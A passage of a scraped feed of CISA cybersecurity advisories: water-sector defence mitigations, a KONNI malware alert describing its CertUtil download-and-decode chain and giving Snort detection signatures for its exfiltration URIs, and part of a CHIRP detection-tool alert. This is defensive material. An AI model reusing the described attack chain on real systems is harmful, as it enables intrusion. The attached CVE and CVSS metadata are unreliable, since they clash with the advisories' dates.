The SCADA system provides visibility and monitoring but is not a full industrial control system (ICS).\n * In September 2020, personnel at a New Jersey-based WWS facility discovered potential Makop ransomware had compromised files within their system.\n * In March 2019, a former employee at Kansas-based WWS facility unsuccessfully attempted to threaten drinking water safety by using his user credentials, which had not been revoked at the time of his resignation, to remotely access a facility computer.\n\n### Mitigations\n\nThe FBI, CISA, EPA, and NSA recommend WWS facilities\u2014including DoD water treatment facilities in the United States and abroad\u2014use a risk-informed analysis to determine the applicability of a range of technical and non-technical mitigations to prevent, detect, and respond to cyber threats.\n\n#### WWS Monitoring\n\nPersonnel responsible for monitoring WWS should check for the following suspicious activities and indicators, which may be indicative of threat actor activity:\n\n * Inability of WWS facility personnel to access SCADA system controls at any time, either entirely or in part;\n * Unfamiliar data windows or system alerts appearing on SCADA system controls and facility data screens that could indicate a ransomware attack;\n * Detection by SCADA system controls, or by water treatment personnel, of abnormal operating parameters\u2014such as unusually high chemical addition rates\u2014used in the safe and proper treatment of drinking water;\n * Access of SCADA systems by unauthorized individuals or groups, e.g., former employees and current employees not authorized/assigned to operate SCADA systems and controls.\n * Access of SCADA systems at unusual times, which may indicate that a legitimate user\u2019s credentials have been compromised\n * Unexplained SCADA system restarts.\n * Unchanging parameter values that normally fluctuate.\n\n#### Remote Access Mitigations\n\nNote: The increased use of remote operations due to the COVID-19 
pandemic increases the necessity for asset owner-operators to assess the risk associated with enhanced remote access to ensure it falls within acceptable levels. \n\n * Require multi-factor authentication for all remote access to the OT network, including from the IT network and external networks.\n * Utilize [blocklisting and allowlisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>) to limit remote access to users with a verified business and/or operational need.\n * Ensure that all remote access technologies have logging enabled and regularly audit these logs to identify instances of unauthorized access.\n * Utilize manual start and stop features in place of always activated unattended access to reduce the time remote access services are running.\n * Audit networks for systems using remote access services. \n * Close unneeded network ports associated with remote access services (e.g., RDP \u2013 Transmission Control Protocol [TCP] Port 3389).\n * When configuring [access control for a host](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>), utilize custom settings to limit the access a remote party can attempt to acquire.\n\n#### Network Mitigations\n\n * Implement and ensure robust network segmentation between IT and OT networks to limit the ability of malicious cyber actors to pivot to the OT network after compromising the IT network. \n * Implement demilitarized zones (DMZs), firewalls, jump servers, and one-way communication diodes to prevent unregulated communication between the IT and OT networks.\n * Develop/update network maps to ensure a full accounting of all equipment that is connected to the network. \n * Remove any equipment from networks that is not required to conduct operations to reduce the attack surface malicious actors can exploit. 
\n\n#### Planning and Operational Mitigations\n\n * Ensure the organization\u2019s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and threats to safety. \n * The plan should also consider third parties with legitimate need for OT network access, including engineers and vendors.\n * Review, test, and update the emergency response plan on an annual basis to ensure accuracy.\n * Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications.\n * Allow employees to gain decision-making experience via [tabletop exercises](<https://www.cisa.gov/publication/cybersecurity-scenarios>) that incorporate loss of visibility and control scenarios. Utilize resources such as the Environmental Protection Agency\u2019s (EPA) [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>) as well as the Ransomware Response Checklist on p. 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### Safety System Mitigations\n\n * Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. \n * Examples of cyber-physical safety system controls include: \n * Size of the chemical feed pump\n * Gearing on valves\n * Pressure switches, etc.\n * These types of controls benefit WWS Sector facilities\u2014especially smaller facilities with limited cybersecurity capability\u2014because they enable facility staff to assess systems from a worst-case scenario and determine protective solutions. 
Enabling cyber-physical safety systems allows operators to take physical steps to limit the damage, for example, by preventing cyber actors, who have gained control of a sodium hydroxide pump, from raising the pH to dangerous levels.\n\n### Additional Mitigations\n\n * Foster an organizational culture of cyber readiness. See the [CISA Cyber Essentials](<https://www.cisa.gov/publication/cyber-essentials-toolkits>) along with the items listed in the Resources section below for guidance. \n * Update software, including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.\n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. \n * Implement regular data backup procedures on both the IT and OT networks. 
\n * Regularly test backups.\n * Ensure backups are not connected to the network to prevent the potential spread of ransomware to the backups.\n * When possible, enable OT device authentication, utilize the encrypted version of OT protocols, and encrypt all wireless communications to ensure the confidentiality and authenticity of process control data in transit.\n * Employ user account management to: \n * Remove, disable, or rename any default system accounts wherever possible.\n * Implement account lockout policies to reduce risk from brute-force attacks.\n * Monitor the creation of administrator-level accounts by third-party vendors with robust and privileged account management policies and procedures.\n * Implement a user account policy that includes set durations for deactivation and removal of accounts after employees leave the organization or after accounts reach a defined period of inactivity.\n * Implement data execution prevention controls, such as application allowlisting and software restriction policies that prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers.\n * Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of users exhibiting unusual activity.\n\nFBI, CISA, EPA, and NSA would like to thank Dragos as well as the WaterISAC for their contributions to this advisory.\n\n### Resources\n\n#### Cyber Hygiene Services\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 
\n\n#### Rewards for Justice Reporting\n\nThe U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ website](<https://rewardsforjustice.net/english/malicious_cyber_activity.html>) for more information and how to report information securely.\n\n#### StopRansomware.gov \n\nThe [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) webpage is an interagency resource that provides guidance on ransomware protection, detection, and response. This includes ransomware alerts, reports, and resources from CISA and other federal partners, including:\n\n * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)\n * CISA Insights: [Ransomware Outbreak](<https://www.cisa.gov/blog/2019/08/21/cisa-insights-ransomware-outbreak-0>)\n * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)\n\n### Additional Resources\n\nFor additional resources that can assist in preventing and mitigating this activity, see:\n\n * FBI-CISA-EPA-MS-ISAC Joint CSA: [Compromise of U.S. 
Water Treatment Facility](<https://us-cert.cisa.gov/ncas/alerts/aa21-042a>)\n * WaterISAC: [15 Cybersecurity Fundamentals for Water and Wastewater Utilities](<https://www.waterisac.org/fundamentals>)\n * American Water Works Association: [Cybersecurity Guidance and Assessment Tool](<https://www.awwa.org/Resources-Tools/Resource-Topics/Risk-Resilience/Cybersecurity-Guidance>)\n * EPA: [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: [Cybersecurity Best Practices for the Water Sector](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: Supporting Cybersecurity Measures with the [Clean Water](<https://www.epa.gov/cwsrf>) and [Drinking Water](<https://www.epa.gov/dwsrf>) State Revolving Funds\n * CISA: [Cyber Risks & Resources for the Water and Wastewater Systems Sector](<https://www.cisa.gov/ncf-water>) infographic\n * CISA: [Critical ICS Cybersecurity Performance Goals and Objectives](<https://www.cisa.gov/control-systems-goals-and-objectives>)\n * CISA Fact Sheet: [Rising Ransomware Threat to Operational Technology Assets](<https://www.cisa.gov/publication/ransomware-threat-to-ot>)\n * CISA-MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>)\n * NSA CSA: [Stop Malicious Cyber Activity Against Connected OT](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)\n * CISA: [Insider Threat Mitigation Resources](<https://www.cisa.gov/publication/insider-threat-mitigation-resources>)\n * NIST: [Special Publication (SP) 800-167, Guide to Application Whitelisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>)\n * NIST: [SP 800-82 Rev. 
2, Guide to Industrial Control Systems (ICS) Security (Section 6.2.1)](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)\n\n### Disclaimer of Endorsement \n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. \n\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### Revisions\n\nInitial Version: October 14, 2021|October 25, 2021: Corrected typo in Additional Resources\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T12:00:00", "type": "ics", "title": "Ongoing Cyber Threats to U.S. Water and Wastewater Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-10-25T12:00:00", "id": "AA21-287A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:32:22", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with malicious Visual Basic for Applications (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.\n\n### Technical Details\n\nKONNI malware is often delivered via phishing emails as a Microsoft Word document with malicious VBA macro code (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)]). The malicious code can change the font color from light grey to black (to trick the user into enabling content), check whether the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files (_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)]).\n\nOnce the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies `certutil.exe` into a temp directory and renames it to evade detection.\n\nThe cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. 
Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [KONNI](<https://attack.mitre.org/versions/v7/software/S0356/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: KONNI ATT&CK techniques_\n\n**Technique** | **Use** \n---|--- \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)] | KONNI can collect the Internet Protocol address from the victim\u2019s machine. \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)] | KONNI can collect the username from the victim\u2019s machine. \n_Masquerading: Match Legitimate Name or Location_ [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005>)] | KONNI creates a shortcut called `Anti virus service.lnk` in an apparent attempt to masquerade as a legitimate file. \n_Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol_ [[T1048.003](<https://attack.mitre.org/versions/v7/techniques/T1048/003>)] | KONNI has used File Transfer Protocol to exfiltrate reconnaissance data. \n_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)] | KONNI has the capability to perform keylogging. \n_Process Discovery_ [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057>)] | KONNI has used `tasklist.exe` to get a snapshot of the current processes\u2019 state of the target machine. \n_Command and Scripting Interpreter: PowerShell_ [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001>)] | KONNI used PowerShell to download and execute a specific 64-bit version of the malware. 
_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003>)] | KONNI has used `cmd.exe` to execute arbitrary commands on the infected host across different stages of the infection chain. \n_Indicator Removal on Host: File Deletion_ [[T1070.004](<https://attack.mitre.org/versions/v7/techniques/T1070/004>)] | KONNI can delete files. \n_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001>)] | KONNI has used Hypertext Transfer Protocol for command and control. \n_System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v7/techniques/T1082>)] | KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used `systeminfo.exe` to get a snapshot of the current system state of the target machine. \n_File and Directory Discovery_ [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083>)] | A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v7/techniques/T1105>)] | KONNI can download files and execute them on the victim\u2019s machine. \n_Modify Registry_ [[T1112](<https://attack.mitre.org/versions/v7/techniques/T1112>)] | KONNI has modified registry keys of the ComSysApp service and Svchost on the machine to gain persistence. \n_Screen Capture_ [[T1113](<https://attack.mitre.org/versions/v7/techniques/T1113>)] | KONNI can take screenshots of the victim\u2019s machine. \n_Clipboard Data_ [[T1115](<https://attack.mitre.org/versions/v7/techniques/T1115>)] | KONNI had a feature to steal data from the clipboard. 
_Data Encoding: Standard Encoding_ [[T1132.001](<https://attack.mitre.org/versions/v7/techniques/T1132/001>)] | KONNI has used a custom base64 key to encode stolen data before exfiltration. \n_Access Token Manipulation: Create Process with Token_ [[T1134.002](<https://attack.mitre.org/versions/v7/techniques/T1134/002>)] | KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user. \n_Deobfuscate/Decode Files or Information_ [[T1140](<https://attack.mitre.org/versions/v7/techniques/T1140>)] | KONNI has used CertUtil to download and decode base64-encoded strings. \n_Signed Binary Proxy Execution: Rundll32_ [[T1218.011](<https://attack.mitre.org/versions/v7/techniques/T1218/011>)] | KONNI has used Rundll32 to execute its loader for privilege escalation purposes. \n_Event Triggered Execution: Component Object Model Hijacking_ [[T1546.015](<https://attack.mitre.org/versions/v7/techniques/T1546/015>)] | KONNI has modified the ComSysApp service to load the malicious DLL payload. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001>)] | A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. \n_Boot or Logon Autostart Execution: Shortcut Modification_ [[T1547.009](<https://attack.mitre.org/versions/v7/techniques/T1547/009>)] | A version of KONNI drops a Windows shortcut on the victim\u2019s machine to establish persistence. \n_Abuse Elevation Control Mechanism: Bypass User Access Control_ [[T1548.002](<https://attack.mitre.org/versions/v7/techniques/T1548/002>)] | KONNI bypassed User Account Control with the \"AlwaysNotify\" settings. 
_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)] | KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. \n\n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting KONNI malware exploits.\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI contains '/weget/*.php' (KONNI)\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; depth:7; offset:0; fast_pattern; content:\".php\"; http_uri; distance:0; within:12; content:!\"Referrer|3a 20|\"; http_header; classtype:http-uri; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|HTTP|0d 0a|\"; http_header; fast_pattern:only; content:\"POST\"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)`\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'\"; sid:1; rev:1; flow:established,to_server; content:\"/weget/\"; http_uri; fast_pattern:only; pcre:\"/^\\/weget\\x2f(?:upload|uploadtm|download)\\.php/iU\"; content:\"POST\"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)`\n\n### Mitigations\n\nCISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.\n\n * Maintain up-to-date antivirus signatures and engines. 
See [Protecting Against Malicious Code](<https://us-cert.cisa.gov/ncas/tips/ST18-271>).\n * Keep operating system patches up to date. See [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>).\n * Disable file and printer sharing services. If these services are required, use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) or Active Directory authentication.\n * Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators\u2019 group unless required.\n * Enforce a strong password policy. See [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).\n * Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See [Using Caution with Email Attachments](<https://us-cert.cisa.gov/ncas/tips/ST04-010>).\n * Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the internet prior to executing.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, \"[Guide to Malware Incident Prevention and Handling for Desktops and 
Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\"\n\n### Resources\n\n * [d-hunter \u2013 A Look Into KONNI 2019 Campaign](<https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b%20>)\n * [MITRE ATT&CK \u2013 KONNI ](<https://attack.mitre.org/versions/v7/software/S0356/>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>)\n\n### Revisions\n\nAugust 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Phishing Emails Used to Deploy KONNI Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-227A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-227a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:16:39", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). 
Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. 
The Alert includes the [CISA-developed Sparrow tool](<https://github.com/cisagov/Sparrow>) that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance, watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine the Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. 
**Note**: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### **Compatibility**\n\nCHIRP currently only scans Windows operating systems.\n\n#### **Instructions**\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A Python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. 
For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. 
CHIRP provides a complementary capability to Sparrow by scanning on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact?**\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). 
\n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 